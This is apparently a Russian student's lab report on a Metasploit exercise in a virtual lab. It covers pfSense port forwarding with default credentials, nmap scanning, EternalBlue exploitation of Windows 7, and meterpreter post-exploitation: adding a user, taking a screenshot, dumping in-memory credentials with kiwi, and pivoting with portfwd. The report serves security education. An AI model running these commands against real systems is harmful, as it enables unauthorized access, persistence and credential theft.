# Практика №3. Эксплутация уязвимостей. MetaSplot Framework
*Выполнил:* Чекунков Александр, БСБО-07-20
---
### Задание.
- Построить инфраструктуру в системе EVE-NG (есть возможность ее импортировать)
- Настроить каждое устройство в соответсвии со следующими параметрами:
- Kali-2021, Win-7, Win-10, Debian - получение адреса DHCP
- На PfSense выполнить проброс с внешних 445/tcp и 3389/tcp портов на аналогичные порты win-7 виртуальной машины
- Выполнить сканирование внешнего интерфейса межсетевого экрана с помощью nmap и Nessus с целью обнаружения уязвимых сервисов
- Использую Metasploit Framework - получить доступ до Windows-7 виртуальной машины
- Используя payload meterpreter:
- выполнить создание нового пользователя
- Выполнить скриншот рабочего стола
- получить все учетные записи, находящиеся в памяти системы
- Выполнить проксирование трафика во внутреннюю инфраструктуру
### Выполнение.
**Построить/импортировать инфраструктуру**
Импортируем инфраструктуру, которая предложена в задании данной практики.
Также включим все ноды, в данной инфраструктуре.

**Выполнить проброс портов**
Зайдем в устройство (например, "win10" или "win7") и зайдем в браузере по следующему адресу: `192.168.218.131`. После авторизируемся по следующим данным: *login* `admin`, *password*: `pfsense`.
Перейдем в *Firewall* -> *NAT* и выполним проброс портов до устройства "win7". Также запомним ip-адрес устройства.

**Сканирование инфраструктуры**
Для сканирования инфраструктуры следует воспользоваться утилитой `nmap`.
Просканировав с помощью данной утилиты получаем открытые порты и сведения об операционной системе.

> nmap -A: Enable OS detection, version detection, script scanning, and traceroute
**Получение доступа к Windows-7**
Для получения доступа к машине перейдем в *msfconsole*, выберем эксплойт `eternalblue`.

Эксплуатриуем уязвимость, указав *rhost*.
Создадим **нового пользователя** - `net user cdrChknk Moscow_4404 /add`.

Выполним **создание скриншота** - `screenshot`.

Получим **все учетные записи**, которые находяться в памяти системы - `load kiwi`, `creds_all`.

Выполним **проксирование трафика** во внутренюю инфраструктуру - `portfwd add -L <KALI_IP> -l <KALI_PORT> -p <WIN-7_PORT> -r 192.168.1.1`
